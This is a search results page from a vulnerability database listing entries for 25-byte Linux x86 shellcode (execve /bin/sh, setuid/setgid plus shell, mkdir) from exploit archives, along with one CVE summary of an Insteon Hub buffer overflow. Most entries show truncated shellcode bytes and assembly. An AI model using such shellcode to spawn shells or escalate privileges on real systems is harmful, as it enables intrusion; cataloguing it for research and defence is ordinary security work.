Lucene search
K

8 matches found

0day.today
0day.today
added 2019/10/16 12:0 a.m.84 views

Linux/x86 - execve /bin/sh Shellcode (25 bytes)

Exploit Title: Linux/x86 - execve /bin/sh ShellCode 25 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 CVE: N/A / global start section .text start: cdq ; xor edx mul edx lea ecx, eax mov esi, 0x68732f2f mov edi, 0x6e69622f push ecx ; push NULL in stack push...

0.1AI score
Exploits0
OSV
OSV
added 2018/08/02 7:29 p.m.1 views

CVE-2017-16346

An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01c368 the value for the smac key is copied using strcpy to the buffer at 0xa000170c. This buffer is 25 bytes large, sending anything longer will cause a buffer...

9.9CVSS6.2AI score
Exploits0References1
0day.today
0day.today
added 2018/01/16 12:0 a.m.14 views

Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)

include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can...

7.1AI score
Exploits0
0day.today
0day.today
added 2017/01/18 12:0 a.m.31 views

Linux/x86-64 - mkdir Shellcode (25 bytes)

/ --------------------------------------------------------------------------------------------------- Linux/x86x64 - mkdir"ajit", 755 - 25 bytes Ajith Kp http://fb.com/ajithkp560 http://www.terminalcoders.blogspot.com Vishnu Nath Kp http://www.terminalcoders.blogspot.com Sayooj S Nambiar...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.26 views

linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes

No description provided by source. / Linux/x86 execve/bin/sh, /bin/sh, NULL - 25 bytes - [email protected] / char shellcode = \x31\xc0 // xor %eax, %eax \x50 // push %eax \x68\x2f\x2f\x73\x68 // push $0x68732f2f \x68\x2f\x62\x69\x6e // push $0x6e69622f \x89\xe3 // mov %esp, %ebx \x50 // push %eax...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.15 views

25 bytes execve("/bin/sh") shellcode

No description provided by source. include stdio.h include string.h / by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 25 bytes execve/bin/sh shellcode Platform: Linux x86 execve/bin/sh, 0, 0; gcc -Wl,-z,execstack filename.c shellcode:...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/03 12:0 a.m.27 views

linux/x86 - execve"/bin/sh", "/bin/sh", NULL 25 bytes

linux/x86 execve"/bin/sh", "/bin/sh", NULL 25 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve"/bin/sh", "/bin/sh", NULL - 25 bytes - [email protected] / char shellcode = "\x31\xc0" // xor %eax, %eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6...

7.4AI score
Exploits0
0day.today
0day.today
added 2006/04/03 12:0 a.m.17 views

linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes

Exploit for linux/x86 platform in category shellcode ======================================================= linux/x86 execve"/bin/sh", "/bin/sh", NULL 25 bytes ======================================================= / Linux/x86 execve"/bin/sh", "/bin/sh", NULL - 25 bytes - email protected / char...

7AI score
Exploits0
Rows per page
Query Builder